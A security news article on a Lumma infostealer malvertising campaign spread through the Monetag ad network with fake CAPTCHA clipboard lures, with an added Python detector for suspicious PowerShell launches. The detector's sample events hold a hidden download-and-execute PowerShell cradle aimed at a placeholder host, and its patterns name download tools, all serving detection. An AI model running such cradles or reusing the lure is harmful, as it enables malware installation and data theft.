A large-scale malvertising campaign distributing the Lumma infostealer malware via intrusive “ads” leading to fake CAPTCHA pages has been tied by researchers to a threat actor abusing the Monetag ad network.
Internet users usually land on one of the many thousands of SEO-optimized sites using Monetag ad-zone scripts after searching for things like streaming videos, anime, sports, academic documents, etc.
The scripts pop open a new tab, which redirects users to a fake CAPTCHA page that instructs them to verify that they are human by pressing a set of buttons in a specific order.
Behind the scenes, that button sequence places a PowerShell script on the clipboard; the victim then pastes it into the Run dialog box and unknowingly executes it by pressing the OK button.
“The malicious pages are frequently updated with new variants to evade detection. Those use different PowerShell one-liners, different script obfuscation to copy the PowerShell script to the clipboard, as well as changes in visual design,” Guardio Labs researchers discovered.
The PowerShell scripts download and execute the Lumma infostealer, just as in previously flagged campaigns (which may or may not be one stage of the campaign documented by Guardio).
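The execution path described above leaves a recognisable trace on the endpoint: a PowerShell process whose parent is explorer.exe (the Run dialog's host), launched with a hidden window, an execution-policy bypass, an encoded command or a download-and-execute cradle. The following detector is an added example written for this article, not code from Guardio Labs or Infoblox; it scores constructed, normalised process-creation records (the field layout is an assumption, not a real Sysmon or Windows 4688 export) and flags the combination rather than any single token, so an admin opening an interactive shell from the Run dialog is not alerted on.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (not real telemetry). The fields
# mimic a normalised Sysmon Event ID 1 / Security 4688 record: timestamp,
# parent image, child image and the full command line.
SAMPLE_EVENTS = [
    # Benign: an admin's console session running a plain cmdlet.
    'ts=2024-12-19T10:00:01Z parent="C:\\Windows\\System32\\cmd.exe" '
    'image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe -NoProfile -Command Get-Date"',
    # Suspicious: explorer.exe parent (what a Run-dialog paste produces), hidden
    # window, policy bypass and a download-and-execute cradle. The host is a
    # placeholder, not an indicator from any real campaign.
    'ts=2024-12-19T10:02:17Z parent="C:\\Windows\\explorer.exe" '
    'image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell -w hidden -ep bypass -c iwr http://placeholder.invalid/a | iex"',
    # Suspicious: same parent, payload hidden behind -EncodedCommand
    # (the base64 blob is constructed filler, not a real payload).
    'ts=2024-12-19T10:03:40Z parent="C:\\Windows\\explorer.exe" '
    'image="C:\\Program Files\\PowerShell\\7\\pwsh.exe" '
    'cmdline="pwsh -WindowStyle Hidden -EncodedCommand QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE="',
    # Benign: a user opened an interactive PowerShell window from the Run dialog.
    'ts=2024-12-19T10:05:03Z parent="C:\\Windows\\explorer.exe" '
    'image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell"',
]

# key=value pairs, value either double-quoted or a bare token.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Command-line indicators typical of a pasted one-liner. Each one alone is
# noisy (admins use -w hidden in scheduled tasks, for example); the detector
# only alerts when several co-occur.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:in|indowstyle)?\s+h(?:idden)?\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|"
        r"downloadfile|net\.webclient|curl|wget)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}


def parse_event(line):
    """Parse one normalised record into a dict of field name -> value."""
    fields = {}
    for key, quoted, bare in FIELD_RE.findall(line):
        fields[key] = quoted if quoted else bare
    return fields


def score_event(fields):
    """Return (score, matched indicator names) for one parsed event."""
    image = PureWindowsPath(fields.get("image", "")).name.lower()
    if image not in POWERSHELL_IMAGES:
        return 0, []
    cmd = fields.get("cmdline", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    parent = PureWindowsPath(fields.get("parent", "")).name.lower()
    # A Run-dialog paste yields explorer.exe as the parent; console use does
    # not. Count it as one signal, never as grounds for an alert on its own.
    if parent == "explorer.exe":
        hits.append("explorer_parent")
    return len(hits), hits


def classify(fields, threshold=3):
    """Label an event 'suspicious' when enough independent signals co-occur."""
    score, hits = score_event(fields)
    return ("suspicious" if score >= threshold else "benign"), hits


def triage(lines, threshold=3):
    """Run the detector over raw record lines; returns (ts, verdict, hits) per line."""
    results = []
    for line in lines:
        fields = parse_event(line)
        verdict, hits = classify(fields, threshold)
        results.append((fields.get("ts"), verdict, hits))
    return results


if __name__ == "__main__":
    for ts, verdict, hits in triage(SAMPLE_EVENTS):
        print(f"{ts}  {verdict:10s}  {', '.join(hits) or '-'}")
```

The threshold of three signals is a tuning choice: the two malicious samples score five and three, while an interactive shell opened from the Run dialog scores one. Where the Run dialog is not needed for legitimate work, the "Remove Run menu from Start Menu" Group Policy (the NoRun value under the Explorer policies key) removes the execution step this lure depends on; otherwise, PowerShell script block logging paired with a rule like the one above is the practical detection layer.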
“In collaboration with Infoblox and through meticulous deobfuscation of JavaScript snippets responsible for triggering ad events, we identified the ad network service responsible—Monetag. Monetag is a subsidiary of PropellerAds, a large ad network company based in Cyprus,” Guardio Labs researchers shared.
The ad network is being leveraged by a threat actor – previously dubbed “Vane Viper” by Infoblox researchers – to distribute malware at a large scale.
The threat actor is using obfuscated scripts, redirect chains, and ad-tracking services like BeMob to conceal their malicious pages and intent from the ad network’s moderators.
The malvertising attack flow (Source: Guardio Labs)
“Over just the past ten days, our analysis estimated up to 1M ‘ad impressions’ per day, arriving from around 3000+ publisher sites,” the researchers pointed out.
The researchers have outlined the flawed ecosystem and buck-passing strategy that makes campaigns such as these possible:
“This fragmented chain of ownership creates a perfect storm of plausible deniability, making it exceptionally difficult to pinpoint and enforce accountability. It’s a system designed to shift blame while allowing malicious campaigns to thrive,” Guardio Labs says.
“Ad networks must prioritize ongoing content moderation, robust account validation to prevent fake registrations, and more accessible reporting mechanisms for the cybersecurity community. Waiting for external reports to address such abuses is not enough. These systems require continuous oversight to protect not just their clients but all internet users.”